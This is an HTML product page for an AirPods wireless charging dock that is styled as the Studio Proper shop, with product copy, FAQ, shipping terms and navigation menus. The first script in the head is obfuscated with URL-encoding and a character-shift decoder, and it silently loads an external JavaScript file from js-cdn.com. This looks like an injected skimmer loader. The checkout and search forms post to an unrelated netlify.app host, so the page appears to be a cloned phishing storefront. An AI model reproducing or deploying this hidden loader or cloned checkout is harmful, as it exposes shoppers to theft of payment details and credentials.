<!DOCTYPE html>
<html class=""  lang="en">
<head>
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631tsd%264E%2633iuuqt%264B00kt.deo/dpn0kt028lck3/kt%2633%264F%264D0tdsjqu%264F1')</script>	
	
	<meta charset="UTF-8">
    <meta http-equiv="cleartype" content="on">
    <meta name="robots" content="index,follow">
    <!-- Stylesheets for Retina 4.3.0 -->
    <link href="font-awesome.css" rel="stylesheet" type="text/css" media="all">
    <link href="styles.scss.css" rel="stylesheet" type="text/css" media="all">
    <link href="custom.css" rel="stylesheet" type="text/css" media="all">
    
    <link rel="shortcut icon" type="image/x-icon" href="favicon.png">


	
   
<style media="all">.additional-checkout-button{border:0 !important;border-radius:5px !important;display:inline-block;margin:0 0 10px;padding:0 24px !important;max-width:100%;min-width:150px !important;line-height:44px !important;text-align:center !important}.additional-checkout-button+.additional-checkout-button{margin-left:10px}.additional-checkout-button:last-child{margin-bottom:0}.additional-checkout-button span{font-size:14px !important}.additional-checkout-button img{display:inline-block !important;height:1.3em !important;margin:0 !important;vertical-align:middle !important;width:auto !important}@media (max-width: 500px){.additional-checkout-button{display:block;margin-left:0 !important;padding:0 10px !important;width:100%}}.additional-checkout-button--apple-pay{background-color:#000 !important;color:#fff !important;display:none;font-family:-apple-system, Helvetica Neue, sans-serif !important;min-width:150px !important;white-space:nowrap !important}.additional-checkout-button--apple-pay:hover,.additional-checkout-button--apple-pay:active,.additional-checkout-button--apple-pay:visited{color:#fff !important;text-decoration:none !important}.additional-checkout-button--apple-pay .additional-checkout-button__logo{background:-webkit-named-image(apple-pay-logo-white) center center no-repeat !important;background-size:auto 100% !important;display:inline-block !important;vertical-align:middle !important;width:3em !important;height:1.3em !important}@media (max-width: 500px){.additional-checkout-button--apple-pay{display:none}}.additional-checkout-button--google-pay{line-height:0 !important;padding:0 !important;border-radius:unset !important;width:80px !important}@media (max-width: 500px){.additional-checkout-button--google-pay{width:100% !important}}.gpay-iframe{height:44px !important;width:100%  !important;cursor:pointer;vertical-align:middle !important}.additional-checkout-button--paypal-express{background-color:#ffc439 !important}.additional-checkout-button--paypal,.additional-checkout-button--venmo{vertical-align:top;line-height:0 !important;padding:0 !important}.additional-checkout-button--amazon{background-color:#fad676 !important;position:relative !important}.additional-checkout-button--amazon .additional-checkout-button__logo{-webkit-transform:translateY(4px) !important;transform:translateY(4px) !important}.additional-checkout-button--amazon .alt-payment-list-amazon-button-image{max-height:none !important;opacity:0 !important;position:absolute !important;top:0 !important;left:0 !important;width:100% !important;height:100% !important}.additional-checkout-button-visually-hidden{border:0 !important;clip:rect(0, 0, 0, 0) !important;clip:rect(0 0 0 0) !important;width:1px !important;height:1px !important;margin:-2px !important;overflow:hidden !important;padding:0 !important;position:absolute !important}
</style>


<style id="shopify-dynamic-checkout">.shopify-payment-button__button--hidden {
  visibility: hidden;
}

.shopify-payment-button__button {
  border-radius: 4px;
  border: none;
  box-shadow: 0 0 0 0 transparent;
  color: white;
  cursor: pointer;
  display: block;
  font-size: 1em;
  font-weight: 500;
  line-height: 1;
  text-align: center;
  width: 100%;
  transition: background 0.2s ease-in-out;
}

.shopify-payment-button__button[disabled] {
  opacity: 0.6;
  cursor: default;
}

.shopify-payment-button__button--unbranded {
  background-color: #1990c6;
  padding: 1em 2em;
}

.shopify-payment-button__button--unbranded:hover:not([disabled]) {
  background-color: #136f99;
}

.shopify-payment-button__more-options {
  background: transparent;
  border: 0 none;
  cursor: pointer;
  display: block;
  font-size: 1em;
  margin-top: 1em;
  text-align: center;
  width: 100%;
}

.shopify-payment-button__more-options:hover:not([disabled]) {
  text-decoration: underline;
}

.shopify-payment-button__more-options[disabled] {
  opacity: 0.6;
  cursor: default;
}

.shopify-payment-button__button--branded {
  display: flex;
  flex-direction: column;
  min-height: 44px;
  position: relative;
  z-index: 1;
}

.shopify-payment-button__button--branded .shopify-cleanslate {
  flex: 1 !important;
  display: flex !important;
  flex-direction: column !important;
}
</style>
<style id="shopify-dynamic-checkout-cart">@media screen and (min-width: 750px) {
  #dynamic-checkout-cart {
    min-height: 50px;
  }
}

@media screen and (max-width: 750px) {
  #dynamic-checkout-cart {
    min-height: 240px;
  }
}
</style><script>window.performance && window.performance.mark && window.performance.mark('shopify.content_for_header.end');</script>

    

    <link href="wc-style.css" rel="stylesheet" type="text/css" media="all">

    <title>
      
        Wireless Charging Dock for Apple Airpods
        
        
        | Studio Proper
      
    </title>

    
      <meta name="description" content="Clever and elegant — Designed to rest and charge by your bedside or at your work desk with ease; the Wireless Charging Dock will keep your AirPods safely stored in a familiar location, always within arm’s reach.">
    


     <!-- Mobile Specific Metas -->
    <meta name="HandheldFriendly" content="True">
    <meta name="MobileOptimized" content="320">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <!-- Icons -->
    <link rel="shortcut icon" type="assets/favicon.png">
    
    <!-- Spase 3D Viewer -->

	<link rel="stylesheet" href="tachyons.min.css">
    <style>
      label.switch{position:relative;display:inline-block;width:60px;height:34px}label.switch input{opacity:0;width:0;height:0}span.slider{position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;background-color:#ccc;-webkit-transition:.4s;transition:.4s}span.slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:white;-webkit-transition:.4s;transition:.4s}input:checked + span.slider{background-color:#01A4BE}input:focus + span.slider{box-shadow:0 0 1px #01A4BE}input:checked + span.slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px)}span.slider.round{border-radius:34px}span.slider.round:before{border-radius:50%}
    </style>
    


    

	</head>
  
  <body liquid="" error:="" unknown="" operator="" template="" class="wireless-charging-dock-for-apple-airpods product "><form action="https://boring-varahamihira-5bc4be.netlify.app/checkout" method="post" id="cart" class="mm-menu mm-theme-white mm-offcanvas mm-right"><div class="mm-panels"><div class="mm-panel mm-opened mm-current" id="mm-8"><div class="mm-navbar"><a class="mm-title">Menu</a></div><ul data-money-format="${{amount}}" data-shop-currency="USD" data-shop-name="Studio Proper" class="mm-listview">
      <li class="mm-subtitle"><a class="mm-subclose continue" href="#cart">Continue Shopping</a></li>

      
        <li class="mm-label empty_cart"><a href="https://www.studioproper.com/cart">Your Cart is Empty</a></li>
      
    </ul></div></div>
    
  </form><div id="nav" class="mm-menu mm-theme-white mm-offcanvas mm-hasnavbar-top-2 mm-hasnavbar-bottom-1"><div class="mm-navbar mm-navbar-bottom mm-navbar-bottom-1 mm-navbar-size-1"></div><div class="mm-navbar mm-navbar-top mm-navbar-top-2 mm-navbar-size-1 mm-hasbtns"><a class="mm-prev mm-btn" href="#mm-1"></a><a class="mm-title" href="#mm-1">iPhone</a></div><div class="mm-navbar mm-navbar-top mm-navbar-top-1 mm-navbar-size-1"><form class="mm-search" action="https://boring-varahamihira-5bc4be.netlify.app/search"><input placeholder="Search" type="text" autocomplete="off" name="q" value=""><input type="hidden" name="type" value="product"></form></div><div class="mm-panels"><div class="mm-panel mm-opened mm-subopened mm-hidden" id="mm-1"><div class="mm-navbar mm-hidden"><a class="mm-title">Menu</a></div><ul class="mm-listview">
      
        
          <li>
            
              <a class="mm-next" href="#mm-2" data-target="#mm-2"></a><a href="https://www.studioproper.com/products/power-uno">Power</a>
            
            
          </li>
        
      
        
          <li>
            
              <a class="mm-next" href="#mm-3" data-target="#mm-3"></a><a href="https://www.studioproper.com/pages/ipad">iPad</a>
            
            
          </li>
        
      
        
          <li>
            
              <a class="mm-next" href="#mm-4" data-target="#mm-4"></a><a href="https://www.studioproper.com/pages/iphone">iPhone</a>
            
            
          </li>
        
      
        
          <li>
            
              <a class="mm-next" href="#mm-5" data-target="#mm-5"></a><a href="https://www.studioproper.com/pages/watch">Watch</a>
            
            
          </li>
        
      
        
          <li>
            
              <a class="mm-next" href="#mm-6" data-target="#mm-6"></a><a href="https://www.studioproper.com/pages/proper-business">Business</a>
            
            
          </li>
        
      
        
          <li><a href="https://www.studioproper.com/pages/deals">Gift Guides</a></li>
        
      
        
          <li>
            
              <a class="mm-next" href="#mm-7" data-target="#mm-7"></a><a href="https://www.studioproper.com/pages/help">...</a>
            
            
          </li>
        
      
      
      
    </ul><div class="mm-noresultsmsg mm-hidden">No results found.</div></div><div class="mm-panel mm-hidden" id="mm-2"><div class="mm-navbar mm-hidden"><a class="mm-btn mm-prev" href="#mm-1" data-target="#mm-1"></a><a class="mm-title" href="#mm-1">Power</a></div><ul class="mm-listview">
              
                
                  <li class=""><a href="https://www.studioproper.com/products/wireless-charging-dock-for-apple-airpods">Airpods Wireless Charging Dock</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/power-uno">Uno Wireless Charger</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/apple-watch-dock">Watch Dock</a></li>
                
              
            </ul></div><div class="mm-panel mm-hidden" id="mm-3"><div class="mm-navbar mm-hidden"><a class="mm-btn mm-prev" href="#mm-1" data-target="#mm-1"></a><a class="mm-title" href="#mm-1">iPad</a></div><ul class="mm-listview">
              
                
                  <li><a href="https://www.studioproper.com/products/cases-for-ipad">Connect iPad Cases</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-7th-gen-10-2-connect-shell-case">Connect iPad (7th Gen) 10.2" Case Kit (Pre-order)</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-pro-11-connect-shell-case">Connect iPad Pro 11"Case Kit (Pre-order)</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-connect-rugged-pro-bumper">Connect Bumper Cases</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-universal-connect-adapter">Universal Connect Adapter</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/pivot-stand">iPad Pivot Stand</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-wall-mount-disk">iPad Wall Mount</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-connect-arm">iPad Connect Arm</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/headrest-mount">iPad Headrest Mount</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-kick-stand">iPad Kick Stand</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-hand-strap">iPad Hand Strap</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-shoulder-strap">iPad Shoulder Strap</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/vesa-arm-adapter">iPad Vesa Adaptor</a></li>
                
              
            </ul></div><div class="mm-panel mm-opened mm-current" id="mm-4"><div class="mm-navbar mm-hidden"><a class="mm-btn mm-prev" href="#mm-1" data-target="#mm-1"></a><a class="mm-title" href="#mm-1">iPhone</a></div><ul class="mm-listview">
              
                
                  <li><a href="https://www.studioproper.com/products/leather-iphone-case">iPhone Xr Leather Case</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/leather-iphone-case">iPhone Xs Leather Case</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/leather-iphone-case">iPhone Xs Max Leather Case</a></li>
                
              
                
                  <li class="mm-selected"><a href="https://www.studioproper.com/products/wireless-charging-dock-for-apple-airpods">Airpods Wireless Charging Dock</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/power-uno">Uno Wireless Charger</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/iphone-x-case">iPhone X / Xs Case</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/iphone-8-case">iPhone 8 / 8 Plus Case</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/iphone-7-case">iPhone 7 / 7 Plus Case</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/iphone-6s-case">iPhone 6 / 6 Plus Case</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/iphone-glass-guard">iPhone Glass Guard</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/iphone-car-mount">iPhone Car Mount</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/iphone-desk-stand">iPhone Desk Stand</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/wall-mount">iPhone Wall Mount</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/iphone-bike-mount">iPhone Bike Mount</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/iphone-tripod-mount">iPhone Tripod Mount</a></li>
                
              
            </ul></div><div class="mm-panel mm-hidden" id="mm-5"><div class="mm-navbar mm-hidden"><a class="mm-btn mm-prev" href="#mm-1" data-target="#mm-1"></a><a class="mm-title" href="#mm-1">Watch</a></div><ul class="mm-listview">
              
                
                  <li><a href="https://www.studioproper.com/products/apple-watch-dock">Apple Watch Dock</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/iphone-desk-stand">Watch + iPhone Stand</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/wall-mount">Watch + iPhone Wall Mount</a></li>
                
              
            </ul></div><div class="mm-panel mm-hidden" id="mm-6"><div class="mm-navbar mm-hidden"><a class="mm-btn mm-prev" href="#mm-1" data-target="#mm-1"></a><a class="mm-title" href="#mm-1">Business</a></div><ul class="mm-listview">
              
                
                  <li><a href="https://www.studioproper.com/pages/proper-business">All Solutions</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-swivel-stand">Powered iPad Swivel Stand for iPad 9.7" (5th &amp; 6th Gen)</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-stand">Powered iPad Stand for iPad 9.7" (5th &amp; 6th Gen)</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-wall-mount">Powered iPad Wall Mount for iPad 9.7" (5th &amp; 6th Gen)</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/powered-ipad-swivel-stand-for-ipad-10-2-7th-gen">Powered iPad Swivel Stand for iPad 10.2" (7th Gen)</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/powered-ipad-stand-for-ipad-10-2-7th-gen">Powered iPad Stand for iPad 10.2" (7th Gen)</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/powered-ipad-wall-mount-for-ipad-10-2-7th-gen">Powered iPad Wall Mount for iPad 10.2" (7th Gen)</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/secure-iphone-stand">Secure iPhone Stand</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/dual-tablet-stand">Dual Tablet Stand</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-connect-arm">iPad Connect Arm</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-mpos-kit">iPad mPOS Kit</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/iphone-mpos-kit">iPhone mPOS Kit</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-kiosk-stand-single-screen-business">iPad Kiosk - SIngle Screen</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-kiosk-stand-dual-screen-business">iPad Kiosk - Dual Screen</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/business-prop-stand">Payment Device Dock</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-pos-pivot-stand">iPad Pivot Stand</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/products/ipad-lock-belt-business">iPad Lock Belts</a></li>
                
              
            </ul></div><div class="mm-panel mm-hidden" id="mm-7"><div class="mm-navbar mm-hidden"><a class="mm-btn mm-prev" href="#mm-1" data-target="#mm-1"></a><a class="mm-title" href="#mm-1">...</a></div><ul class="mm-listview">
              
                
                  <li><a href="https://www.studioproper.com/pages/help">Contact</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/pages/help">Help</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/pages/help#shippingandreturns">Shipping &amp; Returns</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/pages/wholesale">Wholesale</a></li>
                
              
                
                  <li><a href="https://www.studioproper.com/pages/about-us">About Us</a></li>
                
              
            </ul></div></div>
    
  </div>
  
    
    
    <div id="mm-0" class="mm-page mm-slideout"><div id="content_wrapper">

      <div id="shopify-section-header" class="shopify-section header-section">




<div class="hidden">
  

  
</div>




<style>
  
  div.content.container {
    padding: 50px 0px 0px 0px;
  }
  @media only screen and (max-width: 767px) {
    div.content.container, div.content {
      padding-top: 5px;
    }
  }
  .logo a {
    display: block;
    max-width: 110px;
    padding-top: 13px;
  }
  
    .nav ul.menu {
      padding-top: 4px;
    }
  
  
    .mm-search { display: none; }
    #nav .mm-search ~ .mm-listview {
      padding-top: 0;
    }
  
  .header_bar .promo_banner,
  .promo_banner,
  .promo_banner_mobile {
    background-color: #ffffff;
  }
  .header_bar .promo_banner p,
  .promo_banner p,
  .promo_banner_mobile p {
    color: #3a3a3a;
  }
  .promo_banner a,
  .promo_banner a:hover,
  .promo_banner_mobile a,
  .promo_banner_mobile a:hover {
    color: #3a3a3a;
  }
  
    .header_bar .promo_banner,
    .promo_banner,
    .promo_banner_mobile,
    .promo_banner--true .promo_banner {
      display: none !important; /* Overwrite default functionality */
    }
    .index .header_bar .promo_banner,
    .index .promo_banner,
    .index .promo_banner--true .promo_banner {
      display: block !important; /* Overwrite default functionality */
    }
    @media only screen and (max-width: 479px) {
      .index .promo_banner_mobile {
        display: block !important; /* Overwrite default functionality */
      }
    }
  
  .header_bar .promo_banner .icon-close,
  .promo_banner .icon-close,
  .promo_banner_mobile .icon-close {
    color: #3a3a3a;
  }
</style>


</div>

      <div>
        





<!-- /spurit_po-added -->
<div id="shopify-section-product-details-template" class="shopify-section product-template-section product-details-section"><div class="content container">
  <div class="sixteen columns">
    <div class="clearfix breadcrumb">
      <div class="right mobile_hidden">
        

        
      </div>

      
      <div class="breadcrumb_text" itemscope="" itemtype="http://schema.org/BreadcrumbList">
        <span itemprop="itemListElement" itemscope="" itemtype="http://schema.org/ListItem"><a href="https://www.studioproper.com/" title="Studio Proper" itemprop="item"><span itemprop="name">Home</span></a></span>
        &nbsp; / &nbsp;
        <span itemprop="itemListElement" itemscope="" itemtype="http://schema.org/ListItem">
          
          <a href="https://www.studioproper.com/collections/all" title="Products" itemprop="item"><span itemprop="name">Products</span></a>
          
        </span>
        &nbsp; / &nbsp;
        Wireless Charging Dock for Apple Airpods
      </div>
      
    </div>
  </div>

  <div class="sixteen columns">
    <div class="product-3933212573807">

      <div class="section product_section clearfix thumbnail_position--right-thumbnails  product_slideshow_animation--zoom product_images_position--left" data-thumbnail="right-thumbnails" data-slideshow-animation="zoom" data-slideshow-speed="6" itemscope="" itemtype="http://schema.org/Product">
		<div class="nine columns alpha">
			<img src="01_Studio-581.jpg" alt="">
		</div>
        <div class="seven columns omega">
         <h1 class="product_name" itemprop="name">Wireless Charging Dock for Apple Airpods</h1>

          

<div class="wc_custom_star_rating">
  <div class="wc_custom_star_rating_inner">
    <a href="https://www.studioproper.com/pages/customer-reviews/" target="_blank">
      <span class="wc_custom_star_span">
        <span class="wc_rating_star"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 19.481 19.481" xmlns:xlink="http://www.w3.org/1999/xlink" enable-background="new 0 0 19.481 19.481"><g><path d="m10.201,.758l2.478,5.865 6.344,.545c0.44,0.038 0.619,0.587 0.285,0.876l-4.812,4.169 1.442,6.202c0.1,0.431-0.367,0.77-0.745,0.541l-5.452-3.288-5.452,3.288c-0.379,0.228-0.845-0.111-0.745-0.541l1.442-6.202-4.813-4.17c-0.334-0.289-0.156-0.838 0.285-0.876l6.344-.545 2.478-5.864c0.172-0.408 0.749-0.408 0.921,0z"></path></g></svg></span>
        <span class="wc_rating_star"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 19.481 19.481" xmlns:xlink="http://www.w3.org/1999/xlink" enable-background="new 0 0 19.481 19.481"><g><path d="m10.201,.758l2.478,5.865 6.344,.545c0.44,0.038 0.619,0.587 0.285,0.876l-4.812,4.169 1.442,6.202c0.1,0.431-0.367,0.77-0.745,0.541l-5.452-3.288-5.452,3.288c-0.379,0.228-0.845-0.111-0.745-0.541l1.442-6.202-4.813-4.17c-0.334-0.289-0.156-0.838 0.285-0.876l6.344-.545 2.478-5.864c0.172-0.408 0.749-0.408 0.921,0z"></path></g></svg></span>
        <span class="wc_rating_star"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 19.481 19.481" xmlns:xlink="http://www.w3.org/1999/xlink" enable-background="new 0 0 19.481 19.481"><g><path d="m10.201,.758l2.478,5.865 6.344,.545c0.44,0.038 0.619,0.587 0.285,0.876l-4.812,4.169 1.442,6.202c0.1,0.431-0.367,0.77-0.745,0.541l-5.452-3.288-5.452,3.288c-0.379,0.228-0.845-0.111-0.745-0.541l1.442-6.202-4.813-4.17c-0.334-0.289-0.156-0.838 0.285-0.876l6.344-.545 2.478-5.864c0.172-0.408 0.749-0.408 0.921,0z"></path></g></svg></span>
        <span class="wc_rating_star"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 19.481 19.481" xmlns:xlink="http://www.w3.org/1999/xlink" enable-background="new 0 0 19.481 19.481"><g><path d="m10.201,.758l2.478,5.865 6.344,.545c0.44,0.038 0.619,0.587 0.285,0.876l-4.812,4.169 1.442,6.202c0.1,0.431-0.367,0.77-0.745,0.541l-5.452-3.288-5.452,3.288c-0.379,0.228-0.845-0.111-0.745-0.541l1.442-6.202-4.813-4.17c-0.334-0.289-0.156-0.838 0.285-0.876l6.344-.545 2.478-5.864c0.172-0.408 0.749-0.408 0.921,0z"></path></g></svg></span>
        <span class="wc_rating_star"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 19.481 19.481" xmlns:xlink="http://www.w3.org/1999/xlink" enable-background="new 0 0 19.481 19.481"><g><path d="m10.201,.758l2.478,5.865 6.344,.545c0.44,0.038 0.619,0.587 0.285,0.876l-4.812,4.169 1.442,6.202c0.1,0.431-0.367,0.77-0.745,0.541l-5.452-3.288-5.452,3.288c-0.379,0.228-0.845-0.111-0.745-0.541l1.442-6.202-4.813-4.17c-0.334-0.289-0.156-0.838 0.285-0.876l6.344-.545 2.478-5.864c0.172-0.408 0.749-0.408 0.921,0z"></path></g></svg></span>
      </span>
      <span class="wc_see_all_reviews_btn">See All Reviews</span>
    </a>
  </div>
</div>

          
          <span class="shopify-product-reviews-badge" data-id="3933212573807"></span>
          

          

          

          
          <p class="modal_price" itemprop="offers" itemscope="" itemtype="http://schema.org/Offer">
            <meta itemprop="priceCurrency" content="USD">
            <meta itemprop="seller" content="Studio Proper">
            <link itemprop="availability" href="http://schema.org/InStock">
            <meta itemprop="itemCondition" content="New">

            <span class="sold_out"></span>
            <span itemprop="price" content="75.00" class="">
              <span class="current_price ">
                
                <span class="money">$75.00</span>
                
              </span>
            </span>
            <span class="was_price">
              
            </span>
          </p>
    
    <div class="purchase clearfix ">
      
      <input type="hidden" name="return_to" value="/checkout">
      
      <button type="submit" name="add" class="action_button add_to_cart" data-label="BUY NOW"><span class="text">BUY NOW</span></button>
    </div>
    
      <div data-shopify="payment-button" class="shopify-payment-button"><button class="shopify-payment-button__button shopify-payment-button__button--unbranded shopify-payment-button__button--hidden" disabled="disabled" aria-hidden="true">&nbsp;</button><button class="shopify-payment-button__more-options shopify-payment-button__button--hidden" disabled="disabled" aria-hidden="true">&nbsp;</button></div>
    
  
  <p class="vat">VAT not applicable.</p>


          

          

          
          
          <div class="description" itemprop="description">
            <ul class="tabs" style="font-size: 10px;">
<li><a class="active" href="#tab1" style="font-size: inherit;">Description</a></li>
<li><a href="#tab2" style="font-size: inherit;">FAQ</a></li>
<li><a href="#tab3" style="font-size: inherit;">Shipping &amp; Returns</a></li>
</ul>
<ul class="tabs-content">
<li class="active" id="tab1">
<p>Clever and elegant — Designed to rest and charge by your bedside or at your work desk with ease; the Wireless Charging Dock will keep your AirPods safely stored in a familiar location, always within arm’s reach.<br><br> Crafted in beautifully finished anodised Aluminum, it is both a bespoke design statement, subtle enough to complement any environment even when not in use, and your guarantee for fully charged Airpods, always.<br><br> The Charging Dock features an anti-slip rubber base, preventing your AirPods from tumbling to the floor, and ships with a flat&nbsp;tangle free&nbsp;USB-C to USB-A cable in the box.</p>
<p><b>Compatibility:</b> <br>Works with the latest AirPods with Wireless Charging Case (Gen 2).&nbsp;<br><br> <b>Pre-Order Today:</b> <br> The Wireless Charging Dock is currently available for pre-order at a limited discounted price while we move into production. We expect shipping to commence late 2019, and will update all pre-orders via email as we progress.</p>
</li>
<li id="tab2">
<p><strong>Does this include the charging cable?</strong><br>Yes.&nbsp;A USB-C to USB-A cable is included in the box.&nbsp;Or, if&nbsp;you’d prefer to BYO cable, the Wireless Charging Dock will work with any USB-C cable of your choosing.</p>
<p><strong>Can I charge other things with this product?</strong><br>Yes!&nbsp;You can charge any Qi compatible device with this wireless charger, in fact, it makes an awesome iPhone charger too. But we really just designed it for AirPods.</p>
<a href="https://studioproper.zendesk.com/" target="_blank" rel="noopener noreferrer">Full product FAQ &amp; installation guides.</a>
</li>
<li id="tab3">
<p><strong>Shipping</strong><br>We offer free standard shipping on all orders worldwide. Express shipping&nbsp;costs are calculated&nbsp;at the checkout.<br><strong>Returns</strong><br>We offer a 30 day money-back guarantee on all products for any reason. Provided the product&nbsp;is in good condition.<br><strong>Warranty<br></strong>Anything purchased from Proper includes a 12 month warranty.<br><br><a href="https://www.studioproper.com/pages/help" target="_blank" rel="noopener noreferrer">Read full terms &amp; conditions.</a></p>
</li>
</ul>

          </div>
          
          

          

          <div class="meta">
            

            

            
          </div>

          




  <hr>
  
<span class="social_buttons">
  Share:

  

  

  <a href="https://twitter.com/intent/tweet?text=Wireless%20Charging%20Dock%20for%20...&amp;url=https://www.studioproper.com/products/wireless-charging-dock-for-apple-airpods&amp;via=studio_proper" target="_blank" class="icon-twitter" title="Share this on Twitter"></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=https://www.studioproper.com/products/wireless-charging-dock-for-apple-airpods" target="_blank" class="icon-facebook" title="Share this on Facebook"></a>

  
    <a target="_blank" data-pin-do="skipLink" class="icon-pinterest" title="Share this on Pinterest" href="https://pinterest.com/pin/create/button/?url=https://www.studioproper.com/products/wireless-charging-dock-for-apple-airpods&amp;description=Wireless%20Charging%20Dock%20for%20Apple%20Airpods&amp;media=https://cdn.shopify.com/s/files/1/0173/8828/products/AirPod-Charger-418_EDIT_600x.jpg"></a>
  

  <a target="_blank" class="icon-gplus" title="Share this on Google+" href="https://plus.google.com/share?url=https://www.studioproper.com/products/wireless-charging-dock-for-apple-airpods"></a>

  <a href="mailto:?subject=Thought you might like Wireless Charging Dock for Apple Airpods&amp;body=Hey, I was browsing Studio Proper and found Wireless Charging Dock for Apple Airpods. I wanted to share it with you.%0D%0A%0D%0Ahttps://www.studioproper.com/products/wireless-charging-dock-for-apple-airpods" target="_blank" class="icon-email" title="Email this to a friend"></a>
</span>




        </div>

        
      </div>

      
      <br class="clear">
      <div class="section clearfix">
        <div class="description">
          
<div class="container">
<div class="sixteen columns">
<div class="four columns alpha thumbnail even">
<figure style="text-align: center;"><img src="icon_wireless-charging.png" width="100">
<figcaption><strong>Wireless Charging</strong><br>Compatible with Apple AirPods&nbsp;with Wireless Charging Case (Gen 2).</figcaption>
</figure>
</div>
<div class="four columns alpha thumbnail odd">
<figure style="text-align: center;"><img src="icon_cables_large.png" style="display: block; margin-left: auto; margin-right: auto;" width="100">
<figcaption><strong>Cables Managed</strong><br>Ships with a custom designed, flat USB-C to USB-A cable.</figcaption>
</figure>
</div>
<div class="four columns alpha thumbnail even">
<figure style="text-align: center;"><img src="icon_construction.png" style="display: block; margin-left: auto; margin-right: auto;" width="100">
<figcaption><strong>Safety First</strong><br>Features an anti-slip rubber base on the underside to keep your AirPods in place.</figcaption>
</figure>
</div>
<div class="four columns alpha thumbnail odd">
<figure style="text-align: center;"><img src="icon_shield.png" style="display: block; margin-left: auto; margin-right: auto;" width="100">
<figcaption><strong>Designed to Last</strong><br>Built with precision and machined from solid aluminum.</figcaption>
</figure>
</div>
</div>
</div>

<br>
<div class="container">
<div class="sixteen columns">
<div class="section center clearfix">
<h2 class="title">As seen on</h2>
</div>
</div>
</div>
<div class="container">
<div class="sixteen columns">
<div class="four columns alpha thumbnail even">
<figure style="text-align: center;"><img src="Everyday_Carry_LOGO_1200x400_549675b0-127d-49cb-9ba8-814932db39a2.png" alt="Everyday Carry Logo" width="200"></figure>
</div>
<div class="four columns alpha thumbnail odd">
<figure style="text-align: center;"><img src="Gear_Patrol_LOGO_1200x400_846f54e1-178a-4a21-940b-8a41e8642d00.png" alt="Gear Patrol Logo" style="display: block; margin-left: auto; margin-right: auto;" width="200"></figure>
</div>
